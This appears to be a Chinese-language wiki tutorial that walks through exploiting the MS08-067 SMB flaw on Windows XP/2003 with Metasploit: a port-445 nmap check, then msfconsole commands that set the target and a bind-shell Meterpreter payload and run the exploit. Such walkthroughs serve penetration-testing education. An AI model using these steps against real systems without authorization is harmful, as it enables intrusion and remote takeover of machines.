Metasploit/案例研究
外观
假设
- 您正在使用 Metasploit 的最新版本和漏洞利用(svn/subversion)
- 目标机器是运行 Windows XP(SP1、SP2、SP3)或 Windows 2003(SP0)的 Windows 机器
- 目标机器的 445 端口已打开(通过 nmap -p 445 <目标机器的 IP> 检查)
步骤
- 1. 加载 Metasploit 的 msfconsole
- 2. msf > info exploit/windows/smb/ms08_067_netapi
- 3. msf> use exploit/windows/smb/ms08_067_netapi
- 4. msf exploit(ms08_067_netapi) > show options
- 5. msf exploit(ms08_067_netapi) > set RHOST <目标 IP>
- 6. msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
- !您可以使用 generic/shell_bind_tcp 作为有效负载以获得命令提示符。
- 7. msf exploit(ms08_067_netapi) > set TARGET <选择与 'show targets' 命令给出的 ID 相对应的目标>。
- 8. msf exploit(ms08_067_netapi) > exploit
如果一切顺利,您将获得一个 Meterpreter shell。从那里开始,您可以执行后期利用操作(在后期利用活动中解释 |https://wikibooks.cn/wiki/Metasploit/post_exploitation)
使用 MS08_067_Netapi 的视频指南
http://guides.intern0t.net/msf1.php